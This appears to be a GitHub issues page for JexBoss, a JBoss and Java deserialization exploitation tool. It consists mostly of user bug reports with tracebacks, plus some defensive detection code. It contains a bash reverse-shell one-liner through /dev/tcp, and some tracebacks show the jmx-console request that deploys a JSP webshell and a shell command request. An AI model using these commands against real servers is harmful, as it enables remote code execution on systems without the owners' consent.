joaomatosf / jexboss

JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool

License: Other

Python 100.00%
exploit exploiting-vulnerabilities deserialization javadeser gadget reverse-shell

jexboss's Issues

Error

Hello

I've received this error while exploiting the target:

Traceback (most recent call last):
File "jexboss.py", line 1155, in
main()
File "jexboss.py", line 932, in main
auto_exploit(url, vector)
File "jexboss.py", line 513, in auto_exploit
result = _exploits.exploit_jmx_console_file_repository(url)
File "/root/jexboss/_exploits.py", line 267, in exploit_jmx_console_file_repository
gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers)
File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 66, in request
**urlopen_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 87, in request_encode_url
return self.urlopen(method, url, **extra_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 244, in urlopen
response = conn.urlopen(method, u.request_uri, **kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 643, in urlopen
_stacktrace=sys.exc_info()[2])
File "/usr/lib/python2.7/dist-packages/urllib3/util/retry.py", line 363, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='10.175.0.146', port=80): Max retries exceeded with url: /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=jexws4.war&argType=java.lang.String&arg1=jexws4&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=[URL-encoded JSP payload omitted]&argType=boolean&arg4=True (Caused by ProtocolError('Connection aborted.', BadStatusLine("''",)))

Error after deploying code

I often get that kind of result when the code is deployed:

Example:
Shell>jexremote=192.168.0.10:4444

Or use other techniques of your choice, like:
Shell>/bin/bash -i > /dev/tcp/192.168.0.10/4444 0>&1 2>&1

And so on... =]

-----------------------------------------

Then when I type a command, there is no reply from the shell.

Thanks.

Fresh install on Git Bash for Windows is not working

Fresh install without any error on Git Bash for Windows is not working.

$ python jexboss.py -h
Traceback (most recent call last):
File "jexboss.py", line 49, in
from _exploits import *
File "E:\jexboss_exploits.py", line 21, in
from jexboss import *
File "E:\jexboss\jexboss.py", line 64, in
traceback.print_exc(file=debug_file)
NameError: name 'debug_file' is not defined

IndexError: list index out of range - False positive? No IPS.

Hello,
Suggestions? I saw the other list index out of range issue. Figured this is probably the same. Is code actually being uploaded? But not able to connect back to the reverse shell?

I'm running this externally and internally.

@Version: 1.0.11

  • Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
    ** Checking Host: xxx.xxx.xxx.xxx:xxxxx **
  • Checking admin-console: [ EXPOSED ]
  • Checking web-console: [ VULNERABLE ]
  • Checking jmx-console: [ VULNERABLE ]
  • Checking JMXInvokerServlet: [ VULNERABLE ]
  • Do you want to try to run an automated exploitation via "jmx-console" ?
    This operation will provide a simple command shell to execute commands on the server..
    Continue only if you have permission!
    yes/NO ? yes
  • Sending exploit code to xxx.xxx.xxx.xxx:xxxxx Please wait...
  • Successfully deployed code! Starting command shell. Please wait...
    • - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - *
  • xxx.xxx.xxx.xxx:xxxxx:

Traceback (most recent call last):
File "./jexboss.py", line 532, in
main()
File "./jexboss.py", line 381, in main
auto_exploit(url, i)
File "./jexboss.py", line 230, in auto_exploit
shell_http(url, exploit_type)
File "./jexboss.py", line 271, in shell_http
resp += " " + str(r.data).split(">")[1]
IndexError: list index out of range

The check_vul method in jexboss.py isn't rigorous

Hi, joaomatosf,
When I use your tool to exploit, I find many false alarms.
I was told they were all VULNERABLE, then I tried to run an automated exploitation to execute a command, but only got an error "*Error contacting the command shell. Try again later..."
Then I tried to access the url like http://xxxx.com/jmx-console/, the response status is 200 and the body is:

<!--link rel="stylesheet" href="/layout/default.css" type="text/css"-->
<html>
    <head>
        <script type="text/javascript">
window.location.href='http://xxxxxx.com/404.jsp';
</script>
    </head>
    <body>
</body>
</html>

I read the code and suspect the logic of the check_vul method in jexboss.py isn't rigorous. In check_vul, the HEAD method is used to get the response, and whether the target is VULNERABLE is judged only by the response's status. If the status is 200 or 500, it is VULNERABLE. But my response's status is 200 and the response's body is a 404 page. So I think it's better to check the body's content to avoid the false alarm.
Thank you!
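A stricter exposure check along the lines this report suggests, as an added example (not jexboss's own code): it classifies a response by status, redirect target and body content instead of status alone. The marker string for a genuine console page and the `Response` and `classify` names are assumptions; the soft-404 body is the one quoted in the report, the other sample is constructed.

```python
import re
from dataclasses import dataclass, field

# Client-side redirects that turn a "200 OK" into an error page.
JS_REDIRECT = re.compile(
    r"""(?:window\.|document\.)?location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""", re.I)
META_REFRESH = re.compile(
    r"""<meta[^>]+http-equiv=['"]?refresh['"]?[^>]*url=([^'">\s]+)""", re.I)
# Redirect targets whose last path segment looks like an error page.
ERROR_TARGET = re.compile(r"(?:^|/)(?:404|error|not[-_]?found)[^/]*$", re.I)

# Assumption: text expected on a genuine console page; adjust per product/version.
DEFAULT_MARKERS = ("JBoss JMX Management Console",)


@dataclass
class Response:
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""


def _redirect_target(resp):
    """Return the redirect target from the Location header or the body, if any."""
    for name, value in resp.headers.items():
        if name.lower() == "location":
            return value
    for pattern in (JS_REDIRECT, META_REFRESH):
        match = pattern.search(resp.body)
        if match:
            return match.group(1)
    return None


def classify(resp, markers=DEFAULT_MARKERS):
    """Classify a response to a console URL.

    Returns 'absent', 'auth-required', 'soft-404', 'redirect',
    'exposed' or 'inconclusive'.
    """
    if resp.status == 404:
        return "absent"
    if resp.status in (401, 403):
        return "auth-required"
    target = _redirect_target(resp)
    if target is not None:
        path = target.split("?", 1)[0]
        return "soft-404" if ERROR_TARGET.search(path) else "redirect"
    # A 200/500 only counts when the body proves the console answered.
    if resp.status in (200, 500) and any(m in resp.body for m in markers):
        return "exposed"
    # Includes HEAD responses: no body, so the status alone decides nothing.
    return "inconclusive"


# Body quoted in the report above (status 200, JavaScript redirect to 404.jsp).
SOFT_404_BODY = """<!--link rel="stylesheet" href="/layout/default.css" type="text/css"-->
<html>
    <head>
        <script type="text/javascript">
window.location.href='http://xxxxxx.com/404.jsp';
</script>
    </head>
    <body>
</body>
</html>"""

# Constructed sample of a page that carries the assumed marker.
GENUINE_BODY = ("<html><head><title>JBoss JMX Management Console</title></head>"
                "<body><h1>JMX Agent View</h1></body></html>")

if __name__ == "__main__":
    for label, resp in [
        ("report body, 200", Response(200, {}, SOFT_404_BODY)),
        ("HEAD, 200, no body", Response(200, {}, "")),
        ("constructed console page", Response(200, {}, GENUINE_BODY)),
    ]:
        print(f"{label:26} -> {classify(resp)}")
```
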

Checking Struts2 Error

Hi,

When I executed the following command to run jexboss:

python jexboss.py -host http://localhost:8080

I am getting the following result

 * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **


 ** Checking Host: http://localhost:8080 **

 [*] Checking admin-console:                  [ OK ]
 [*] Checking Struts2:                      
 * An error occurred while connecting to the host http://localhost:8080 (HTTPConnectionPool(host='localhost', port=8080): Max retries exceeded with url: / (Caused by ReadTimeoutError("HTTPConnectionPool(host='localhost', port=8080): Read timed out. (read timeout=6.0)",)))

 [*] Checking Servlet Deserialization:        [ OK ]
 [*] Checking Application Deserialization:    [ OK ]
 [*] Checking Jenkins:                        [ OK ]
 [*] Checking web-console:                    [ OK ]
 [*] Checking jmx-console:                    [ OK ]
 [*] Checking JMXInvokerServlet:              [ OK ]


 * Results: 
   The server is not vulnerable to bugs tested ... :D

 * Info: review, suggestions, updates, etc: 
   https://github.com/joaomatosf/jexboss

 * DONATE: Please consider making a donation to help improve this tool,
 * Bitcoin Address:  14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C 

Can anyone help me with this? The connection between my workstation and the remote server (for which I have masked the IP with 'localhost' here) is completely fine. I have access to all services on this server.

DH key too small

  • An error occurred while connecting to the host https://172.xx.xx.xx:7443/ (HTTPSConnectionPool(host='172.xx.xx.xx', port=7443): Max retries exceeded with url: //invoker/JMXInvokerServlet (Caused by SSLError(SSLError(1, u'[SSL: DH_KEY_TOO_SMALL] dh key too small (_ssl.c:661)'),)))

How to solve this problem, anyone?

IndexError: list index out of range

Hello,

I have a problem, failed script.

  • Checking Host: http://x.x.x.x:9443/ **
    • Checking web-console: [ VULNERABLE ]
    • Checking jmx-console: [ VULNERABLE ]
    • Checking JMXInvokerServlet: [ VULNERABLE ]
    • Do you want to try to run an automated exploitation via "jmx-console" ?
      This operation will provide a simple command shell to execute commands on the server..
      Continue only if you have permission!
      yes/NO ? yes
    • Sending exploit code to http://x.x.x.x:9443/. Wait...
    • Successfully deployed code! Starting command shell, wait...
      • - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - *
    • http://x.x.x.x:9443/:

Traceback (most recent call last):
File "jexboss.py", line 415, in
autoExploit(url, i)
File "jexboss.py", line 105, in autoExploit
shell_http(url, type)
File "jexboss.py", line 133, in shell_http
resp += " " + r.data.split(">")[1]
IndexError: list index out of range

Auto Exploit not working correctly?

I noticed that the variable was declared as "auto-exploit", but was referenced as "auto_exploit" in the rest of the code (dash vs. underscore). This may be causing issues with the intended function of the auto-exploit feature:

Line 505: parser.add_argument("--auto-exploit", "-A",....

Line 228: if not gl_args.auto_exploit:

encode error?

Hi joaomatosf,

Traceback (most recent call last):
File "jexboss.py", line 660, in
main()
File "jexboss.py", line 542, in main
result_exploit = auto_exploit(url, key)
File "jexboss.py", line 313, in auto_exploit
result = _exploits.exploit_admin_console(url, gl_args.jboss_login)
File "C:\Python2713\jexboss-master_exploits.py", line 466, in exploit_admin_console
payload = "login_form=login_form&login_form%3Aname="+username+"&login_form%3Apassword="+password+"&login_form%3Asubmit=Login&javax.faces.ViewState="+url_encode(state)
File "C:\Python2713\jexboss-master_exploits.py", line 442, in url_encode
return urllib.quote_plus(text)
File "C:\Python2713\lib\urllib.py", line 1303, in quote_plus
if ' ' in s:
TypeError: argument of type 'NoneType' is not iterable

SSL Certificate Verification Warning Messages

Is anyone having the same error messages as follows?

/usr/local/lib/python2.7/dist-packages/requests/packages/urllib3/connectionpool.py:843: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
  InsecureRequestWarning)

Based on the recommended URL, I added the disable warning message (not recommended of course) but am still seeing a horde of the warning messages. Any idea?

import urllib3
urllib3.disable_warnings()


Runtime Error Message on Default Kali 2016

When running on the default Kali 2016 install (or Ubuntu derivatives, etc.), the following error message is seen:

Traceback (most recent call last):
  File "jexboss.py", line 23, in <module>
    from idlelib.ColorDelegator import prog
ImportError: No module named idlelib.ColorDelegator

This is a dependency issue (https://pypi.python.org/pypi/cricket/0.2.3). Kali and Ubuntu's packaging of Python omits the idlelib library from its base package.

Users can install idlelib by running:

$ sudo apt-get install idle-python2.7

BadStatusLine("''",)

Hi, on:

Python 2.7.12 (default, Nov  7 2016, 11:55:55) 
[GCC 6.2.1 20160830] on linux2

after:

/opt/jexboss:
> sudo pip install -r requires.txt 
Requirement already satisfied: urllib3>=1.8 in /usr/lib/python2.7/site-packages (from -r requires.txt (line 1))
Requirement already satisfied: ipaddress in /usr/lib/python2.7/site-packages (from -r requires.txt (line 2))

I've got a problem with the exploit:

** Checking Host: http://10.0.0.2:8081 **

 * Checking admin-console: 	 [ OK ]
 * Checking web-console: 	 [ VULNERABLE ]
 * Checking jmx-console: 	 [ VULNERABLE ]
 * Checking JMXInvokerServlet: 	 [ VULNERABLE ]

 * Do you want to try to run an automated exploitation via "jmx-console" ?
   This operation will provide a simple command shell to execute commands on the server..
   Continue only if you have permission!
   yes/NO? yes

 * Sending exploit code to http://10.0.0.2:8081. Please wait...

Traceback (most recent call last):
  File "./jexboss.py", line 681, in <module>
    main()
  File "./jexboss.py", line 520, in main
    auto_exploit(url, i)
  File "./jexboss.py", line 303, in auto_exploit
    result = _exploits.exploit_jmx_console_file_repository(url)
  File "/opt/jexboss/_exploits.py", line 176, in exploit_jmx_console_file_repository
    gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers)
  File "/usr/lib/python2.7/site-packages/urllib3/request.py", line 66, in request
    **urlopen_kw)
  File "/usr/lib/python2.7/site-packages/urllib3/request.py", line 87, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "/usr/lib/python2.7/site-packages/urllib3/poolmanager.py", line 244, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 671, in urlopen
    release_conn=release_conn, **response_kw)
  File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 671, in urlopen
    release_conn=release_conn, **response_kw)
  File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 671, in urlopen
    release_conn=release_conn, **response_kw)
  File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 643, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "/usr/lib/python2.7/site-packages/urllib3/util/retry.py", line 363, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='10.0.0.2', port=8081): Max retries exceeded with url: /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=jexws4.war&argType=java.lang.String&arg1=jexws4&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=[URL-encoded JSP payload omitted]&argType=boolean&arg4=True (Caused by ProtocolError('Connection aborted.', BadStatusLine("''",)))

Any clue how to prevent this kind of error?
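The request URL visible in the tracebacks on this page (a `store` call on the `DeploymentFileRepository` MBean through `/jmx-console/HtmlAdaptor`) is a useful detection signature for server access logs. The following is an added example, not part of jexboss or of any post here: it assumes Common/Combined Log Format, and the log lines are constructed samples using documentation IP ranges.

```python
import re
from urllib.parse import parse_qs, unquote

# Common/Combined Log Format: ip, identity, user, [time], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

SCRIPT_EXTENSIONS = (".jsp", ".jspx")


def _first(query, key):
    """First value of a query parameter, or an empty string."""
    return query.get(key, [""])[0]


def find_file_repository_writes(lines):
    """Return one dict per request that invokes DeploymentFileRepository.store
    through the jmx-console HtmlAdaptor."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Split by hand: urlsplit() would read a leading '//' as a host name.
        path, _, raw_query = m["target"].partition("?")
        if not unquote(path).rstrip("/").lower().endswith("/jmx-console/htmladaptor"):
            continue
        query = parse_qs(raw_query, keep_blank_values=True)  # also percent-decodes
        if (_first(query, "action") != "invokeOpByName"
                or "DeploymentFileRepository" not in _first(query, "name")
                or _first(query, "methodName") != "store"):
            continue
        extension = _first(query, "arg2")
        hits.append({
            "ip": m["ip"],
            "time": m["ts"],
            "method": m["method"],
            "status": int(m["status"]),
            "archive": _first(query, "arg0"),              # target .war directory
            "filename": _first(query, "arg1") + extension,  # file written inside it
            "writes_jsp": extension.lower().endswith(SCRIPT_EXTENSIONS),
        })
    return hits


_STORE = ("/jmx-console/HtmlAdaptor?action=invokeOpByName"
          "&name=jboss.admin:service=DeploymentFileRepository&methodName=store")

# Constructed sample log lines (arg3 is a placeholder, not a real payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Nov/2016:12:00:01 +0000] "HEAD ' + _STORE +
    '&argType=java.lang.String&arg0=jexws4.war&argType=java.lang.String&arg1=jexws4'
    '&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=PLACEHOLDER'
    '&argType=boolean&arg4=True HTTP/1.1" 200 -',
    '198.51.100.7 - admin [07/Nov/2016:12:03:10 +0000] "GET /jmx-console/HtmlAdaptor'
    '?action=inspectMBean&name=jboss.system:type=Server HTTP/1.1" 200 5120',
    '198.51.100.7 - - [07/Nov/2016:12:03:11 +0000] "GET /index.html HTTP/1.1" 200 1043',
    '192.0.2.44 - - [07/Nov/2016:12:05:30 +0000] "GET /jmx-console/HtmlAdaptor'
    '?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
    '&methodName=store&arg0=test.war&arg1=readme&arg2=.txt&arg3=x&arg4=True'
    ' HTTP/1.1" 500 -',
]

if __name__ == "__main__":
    for hit in find_file_repository_writes(SAMPLE_LOG):
        severity = "HIGH" if hit["writes_jsp"] else "review"
        print(f'[{severity}] {hit["time"]} {hit["ip"]} {hit["method"]} '
              f'-> {hit["archive"]}/{hit["filename"]} (status {hit["status"]})')
```

Any hit deserves review, since the console should not be reachable without authentication; a hit that writes a `.jsp` file is the pattern shown in the tracebacks above.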

error when trying admin_console

Getting following error when trying admin_console

[code]
Traceback (most recent call last):
File "./jexboss.py", line 681, in
main()
File "./jexboss.py", line 520, in main
auto_exploit(url, i)
File "./jexboss.py", line 313, in auto_exploit
result = _exploits.exploit_admin_console(url, gl_args.jboss_login)
File "/root/jexboss/_exploits.py", line 461, in exploit_admin_console
cookie = r.getheader('set-cookie').split(";")[0]
AttributeError: 'NoneType' object has no attribute 'split'
[/code]

Proxy feature request

I'm getting "connection timed out", probably because the machine I'm running on can only reach the internet through a proxy.
I thought that using the "-D" option would avoid the error below, but I got the same error. Shouldn't this option prevent the call to http://joaomatosf.com/rnp/releases.txt?
So this issue is actually a feature request to implement proxy support.

Traceback (most recent call last):
  File "jexboss.py", line 551, in <module>
    main()
  File "jexboss.py", line 367, in main
    updates = check_updates()
  File "E:\jexboss\_updates.py", line 107, in check_updates
    r = pool.request('GET', url, redirect=False, headers=header)
  File "E:\Python27\lib\site-packages\urllib3\request.py", line 66, in request
    **urlopen_kw)
  File "E:\Python27\lib\site-packages\urllib3\request.py", line 87, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "E:\Python27\lib\site-packages\urllib3\poolmanager.py", line 244, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "E:\Python27\lib\site-packages\urllib3\connectionpool.py", line 671, in urlopen
    release_conn=release_conn, **response_kw)
  File "E:\Python27\lib\site-packages\urllib3\connectionpool.py", line 671, in urlopen
    release_conn=release_conn, **response_kw)
  File "E:\Python27\lib\site-packages\urllib3\connectionpool.py", line 671, in urlopen
    release_conn=release_conn, **response_kw)
  File "E:\Python27\lib\site-packages\urllib3\connectionpool.py", line 643, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "E:\Python27\lib\site-packages\urllib3\util\retry.py", line 303, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='joaomatosf.com', port=80): Max retries exceeded with url: /rnp/releases.txt (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x000000000357A518>, 'Connection to joaomatosf.com timed out. (connect timeout=3.0)'))

Error after Successful Deployment

Got the following error:

 * Sending exploit code to [redacted]. Please wait...

 * Successfully deployed code! Starting command shell. Please wait...

 * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * 

 * [redacted]: 

Traceback (most recent call last):
  File "jexboss.py", line 544, in <module>
    main()
  File "jexboss.py", line 393, in main
    auto_exploit(url, i)
  File "jexboss.py", line 242, in auto_exploit
    shell_http(url, exploit_type)
  File "jexboss.py", line 283, in shell_http
    resp += " " + str(r.data).split(">")[1]
IndexError: list index out of range

I'm not sure if the site's IPS is the one causing the issue.

parser.add_argument

I'm executing in the correct syntax:

python jexboss.py -host https://host

I keep getting this returned:

parser.add_argument('-mode', help="Operation mode", choices={'standalone','auto-scan', 'file-scan'}, default='standalone')

What am I doing wrong? Thanks!

how to create shellcode?

Can you tell me what you use to create jsp shellcode?
like:

noo after the latest update i can't interact with shell please fix

-----------------------------------------

Unknown command
Unknown command
Failed to check for updates
Unknown command
[Type commands or "exit" to finish]
Shell> ls
Unknown command

[Type commands or "exit" to finish]
Shell> ipconfig
Failed to check for updates
Unknown command

[Type commands or "exit" to finish]
Shell>

An error occurred while connecting to the host

Hello
I get this error while checking the server:

[*] Checking Servlet Deserialization:

  • An error occurred while connecting to the host @ip:80 (HTTPConnectionPool(host='jst11.azurewebsites.net', port=80): Max retries exceeded with url: / (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f2a1f585450>, 'Connection to jst11.azurewebsites.net timed out. (connect timeout=1.0)')))

[*] Checking Application Deserialization:

  • An error occurred while connecting to the host @ip:80 (HTTPConnectionPool(host='jst11.azurewebsites.net', port=80): Max retries exceeded with url: / (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f2a1f585510>, 'Connection to jst11.azurewebsites.net timed out. (connect timeout=1.0)')))

Failed to parse:

I'm getting the following error when trying to use jexboss for the first time:

  • An error occurred while connecting to the host https://:443None (Failed to parse: :443None)

-y flag

Hello,

Is it possible to add a "-y" flag for the exploit testing? This way the code can essentially perform an autoscan/exploit when running an individual host-based scan.

Detection of CVE-2010-1871

I'd like to add support for the detection of this vulnerability, would you be interested if I submitted a pull request for this?

License

Hi, I want to add your tool into ArchStrike. Would it be possible to add a license file?

how can I replace built-in payload?

Hi friend,
I noticed that you provided a --load-gadget flag. Does this mean I can use ysoserial to generate a payload? Can you tell me how you generated the built-in payloads?
Thanks!

how to call a real tty.

Hi João,
is there any way to call a real tty, or just making a reverse connection?
thanks!

Ysoserial

Hi, thanks for the awesome tool, but I want to ask how we can use our own payload with --load-gadget? Or can you please add a ysoserial payload generation tool to automate this? I see you added some of them but not all. Sorry for bad English. Thank you for your attention. Regards.

admin-console exploit error

When using standalone mode and -A with a target whose admin-console is vulnerable, I got this:

    pydev_imports.execfile(file, globals, locals) # execute the script
  File "F:/Dev/Python_Projects/gsz/jexboss.py", line 1016, in <module>
    main()
  File "F:/Dev/Python_Projects/gsz/jexboss.py", line 885, in main
    auto_exploit(url, vector)
  File "F:/Dev/Python_Projects/gsz/jexboss.py", line 548, in auto_exploit
    result = _exploits.exploit_admin_console(url, gl_args.jboss_login)
  File "F:/Dev/Python_Projects/gsz_exploits.py", line 825, in exploit_admin_console
    cookie = rheader.split(";")[0]
AttributeError: 'NoneType' object has no attribute 'split'

The line message may be wrong because I have modified this version.
It may be caused by the response "set-cookie" being null, because the username/password is wrong.

still vulnerable?

hello,

I was wondering, is there a patch already that fixes these vulnerabilities, or can this script be executed on all JBoss versions :D

thanks.

Resume session without re-exploiting

Hi,

Firstly, thanks for the great tool!

I'm not aware of any way to resume a session with an already exploited server (on which the webshell is already deployed), have I missed something?

If not I think it can be an interesting feature to implement.

Thanks!

shell doesn't work on windows systems

Not sure if it is a bug or a feature, but if you try to exploit a vulnerability in a Windows target the Shell doesn't work. All the vulnerabilities are correctly identified though.

generating false positives with a malformed http response

running Python 2.7, the following line returns a r.status of 200
https://github.com/joaomatosf/jexboss/blob/master/jexboss.py#L120

in certain cases, hosts listening on port 80 do not handle the HEAD request nicely and return a garbage response. It looks like Python 2 is doing this, while Python 3 will see the correct response and generate an exception

In 2.7:

>>> r = pool.request('HEAD', url +str(paths['admin-console']), redirect=False, headers=headers)
>>> r.status
200

In 3.4:

>>> r = pool.request('HEAD', url +str(paths['admin-console']), redirect=False, headers=headers)
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 331, in _make_request
    httplib_response = conn.getresponse(buffering=True)
TypeError: getresponse() got an unexpected keyword argument 'buffering'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 516, in urlopen
    body=body, headers=headers)
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 333, in _make_request
    httplib_response = conn.getresponse()
  File "/usr/lib/python3.4/http/client.py", line 1171, in getresponse
    response.begin()
  File "/usr/lib/python3.4/http/client.py", line 351, in begin
    version, status, reason = self._read_status()
  File "/usr/lib/python3.4/http/client.py", line 333, in _read_status
    raise BadStatusLine(line)
http.client.BadStatusLine:  Ú¬LIP�=¶<��Þ�brĸ�¢nÆGÕc¡»�6Fh¶ñ?àTáÿ»�¾îr»0á�÷<}�Ù6¯�õ¢+àÑÎgìmºc¸ÉfDåÒ��Áþ×�]êÓh¹��ôÕ

urllib3.exceptions.MaxRetryError issue - not sure why

I get the following error, even though it says successful. Screen dump below. @Version: 1.0.10

  • Do you want to try to run an automated exploitation via "jmx-console" ?
    This operation will provide a simple command shell to execute commands on the server..
    Continue only if you have permission!
    yes/NO ? yes
    • Sending exploit code to x.x.x.x:8080. Please wait...
    • Successfully deployed code! Starting command shell. Please wait...
      • - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - *

Traceback (most recent call last):
  File "jexboss.py", line 523, in <module>
    main()
  File "jexboss.py", line 372, in main
    auto_exploit(url, i)
  File "jexboss.py", line 221, in auto_exploit
    shell_http(url, exploit_type)
  File "jexboss.py", line 261, in shell_http
    r = pool.request('GET', url + path + cmd, redirect=False, headers=headers)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 68, in request
    **urlopen_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 81, in request_encode_url
    return self.urlopen(method, url, **urlopen_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 161, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 617, in urlopen
    release_conn=release_conn, **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 617, in urlopen
    release_conn=release_conn, **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 617, in urlopen
    release_conn=release_conn, **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 597, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "/usr/lib/python2.7/dist-packages/urllib3/util/retry.py", line 271, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='x.x.x.x', port=8080): Max retries exceeded with url: /jexws3/jexws3.jsp?ppp=id (Caused by ReadTimeoutError("HTTPConnectionPool(host='x.x.x.x', port=8080): Read timed out. (read timeout=6.0)",))
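
The request in the traceback above (`/jexws3/jexws3.jsp?ppp=id`) is what a deployed webshell looks like from the server side. The following is an added example, not part of the issue or of JexBoss: a defender-side scan of web access logs for that path and parameter, assuming combined log format and using constructed sample lines.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Path and parameter are taken from the traceback above. This is one
# indicator only; it is not a complete list of names the tool may deploy.
WEBSHELL_PATH = "/jexws3/jexws3.jsp"
CMD_PARAM = "ppp"

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def find_webshell_hits(lines):
    """Return {client_ip: [(timestamp, status, command_or_None), ...]}."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed log line: skip instead of failing the scan
        parts = urlsplit(m.group("target"))
        # Undo percent-encoding, duplicate slashes and case tricks before comparing.
        path = re.sub(r"/+", "/", unquote(parts.path)).lower()
        if path != WEBSHELL_PATH:
            continue
        # parse_qs also decodes an encoded parameter name such as %70pp.
        params = parse_qs(parts.query, keep_blank_values=True)
        # A hit without the parameter (e.g. a probe) is recorded with None.
        for cmd in params.get(CMD_PARAM, [None]):
            hits[m.group("ip")].append((m.group("ts"), int(m.group("status")), cmd))
    return dict(hits)

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2016:13:55:36 +0000] "GET /jexws3/jexws3.jsp?ppp=id HTTP/1.1" 200 312',
    '203.0.113.7 - - [10/Oct/2016:13:55:41 +0000] "GET /jexws3/%6Aexws3.jsp?%70pp=uname%20-a HTTP/1.1" 200 540',
    '198.51.100.4 - - [10/Oct/2016:13:56:02 +0000] "GET /index.jsp?ppp=1 HTTP/1.1" 200 1200',
    '198.51.100.9 - - [10/Oct/2016:13:57:10 +0000] "HEAD /jexws3/jexws3.jsp HTTP/1.1" 404 0',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for ip, events in find_webshell_hits(SAMPLE_LOG).items():
        for ts, status, cmd in events:
            print(ip, ts, status, repr(cmd))
```

A 200 response on this path means the file exists on the server and the host should be treated as compromised; a 404 usually indicates a probe or an already cleaned host.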

SSL Issue

I'm getting the following SSL issue. Any way to fix this?

 [*] Checking JMXInvokerServlet:
 * An error occurred while connecting to the host https://example.com/ ([SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:661))

IndexError: list index out of range

** Checking Host: http://www.frauen-ficken.webcam-sex-chat.net **

  • Checking admin-console: [ EXPOSED ]
  • Checking web-console: [ VULNERABLE ]
  • Checking jmx-console: [ VULNERABLE ]
  • Checking JMXInvokerServlet: [ VULNERABLE ]
  • Do you want to try to run an automated exploitation via "jmx-console" ?
